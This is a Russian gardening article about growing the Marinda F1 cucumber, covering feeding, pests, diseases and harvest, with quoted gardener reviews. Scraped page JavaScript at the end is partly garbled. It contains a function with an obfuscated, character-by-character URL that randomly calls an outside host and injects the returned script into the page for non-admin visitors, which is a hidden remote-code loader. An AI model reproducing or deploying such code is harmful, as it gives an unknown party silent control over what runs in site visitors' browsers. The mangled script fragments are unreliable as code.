Если сделаете перерыв в поливах, огурцы «решат», что пора прекращать расти, и быстро пожелтеют и увянут.

Подкормки нужно давать 4–5 раз за сезон, лучше всего каждые 10–12 дней. Первая подкормка проводится в начале роста зелёной массы — примерно через 2 недели через пересадки рассады в открытый грунт. Для первой подкормки лучше всего использовать настой куриного помёта (1:20) или навоза. Во время цветения полезно подкормить растения перебродившим травяным настоем, для приготовления которого 1 часть зелёной травы заливают 5 частями воды и оставляют на 10–15 дней.

Подкормка огурцов — видео

В период плодоношения также подкармливают травяным настоем, добавляя на каждые 10 л по 100–120 г золы. Последующие подкормки призваны продлить плодоношение, для них используют раствор пищевой соды (30–35 г) и золы (100–120 г) на ведро воды. Все эти подкормки вносятся из расчёта 10 л/м 2 .

Болезни и вредители: как с ними бороться

На Маринду могут нападать различные вредители — тля, паутинный клещ, слизни. При обнаружении вредителей нужно использовать следующие препараты: слизней можно ликвидировать метальдегидом 5 %-м. С клещами следует бороться с помощью коллоидной серы, а с тлёй — составом из табачной пыли (200 г), красного перца (10 г) и ведра горячей воды (55–60 о С).

Вредители огурцов — фотогалерея

Из болезней Маринда подвержена более всего антракнозу и угловатой пятнистости.

Антракноз проявляется в виде коричневатого цвета вдавленностей на корневой шейке молодых ростков, а затем желтоватых пятен на стеблях и листьях. От антракноза помогает обработка препаратами меди (бордоская жидкость 1 %, ХОМ 0,4 %). После обнаружения болезни нельзя сажать на том же месте огурцы 6–7 лет. Профилактикой заболевания является соблюдение севооборота, предпосевная обработка семян, соблюдение режима поливов.

При угловатой пятнистости на листьях появляются тёмно-зелёные пятна, которые затем буреют и усыхают, на нижней стороне листа выступают капли жидкости, лист превращается в плёнку. На плодах появляются бурые язвы, затем плоды деформируются. Для лечения требуется обработка Абига-Пик или Купроксатом. Для профилактики необходимо своевременно ликвидировать растительные остатки и соблюдать севооборот.

Лечение антракноза огурца — видео

Сбор урожая и его использование

Созревание урожая начинается примерно через полтора месяца после появления всходов (если семена посеяны в апреле, то в начале июня уже появятся первые плоды). Собирать плоды нужно каждые 2–3 дня — это способствует увеличению числа завязей. Для сбора лучше всего подходят утренние часы. Зеленцы отделяют от плети с помощью ножа или ножниц. Если обнаружились переросшие плоды, их тоже обязательно нужно срезать, иначе плодоношение ухудшается. Хранить урожай огурцов можно в течение 20–21 дней при температуре 5–7 о С. Из огурцов Маринда можно готовить салаты или использовать их для домашней консервации.

Урожай огурцов Маринда по сравнению с другими сортами — видео

Отзывы огородников об огурцах Маринда

Семена огурец-корнишон «Маринда F1» отличается хорошей устойчивостью к перепадам температуры. Все знают, что огурцы крайне чувствительны к пересадке. Искренне рекомендую не проводить пересадку, а сеять на постоянное место огурцы под банки. Даже в теплице. Или под пластиковые стаканчики. Под банки высевать огурцы меня научила бабушка. это так здорово: трехлитровые банки позволяют вырастит огурец на пять-шесть листиков. а стекло держит тепло длительное время. но и пластиковые бутылки довольно эффективны в качестве «мини- теплиц» для огурцов. Рекомендую оставлять им достаточное количество места, так ка они разрастаются на пол метра в обе стороны.

ek9345, Екатеринбург

http://otzovik.com/review_3106214.html

Очень хороший сорт. Маринда и Герман F1. Единственное: Маринду нужно вовремя собирать, т. к. легко и быстро перерастает. Сажаем постоянно и много лет (Ленобласть)

Чиффа

https://otvet.mail.ru/question/164762553

Маринда это сорт давний. Я его дома выращивала в той жизни. Есть уже современные сорта. Мне лучше Алекс F1 и КонниF1 и Rитайский холодостойкий

афина, Западная Сибирь

https://otvet.mail.ru/question/164762553

Мне очень понравились гибриды: Маринда, Престиж, Астерикс, Пальчик, Суздальский. Все сажала в этом году, особенно нравится «Маринда», сажаю неизменно уже много лет.

Лобелия, Жуковский

https://www.forumhouse.ru/threads/6600/page-6

Семена «Маринда F1″я приобрела в магазине семян, мне очень понравилась картинка. Как новичок в этом деле и помня рекомендации бывалых дачников я начала читать как правильно посадить огурчики. В мае я посадила пару пакетиков и буквально через неделю я обнаружила первые всходы, спустя еще неделю начали развиваться листья и начали появляться завязи. После цветения и опыления, в один прекрасный день я обнаружила свои первые огурчики. На вкус они оказались очень вкусные и хрустящие.

Irysa, Курск

http://otzovik.com/review_3107391.html

Гибридный огурец Маринда очень удобен для выращивания на приусадебном участке — может расти и на открытой грядке, и в теплице, и даже в комнате. Не требует сложного ухода и при этом даёт обильные урожаи аккуратных маленьких огурчиков.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};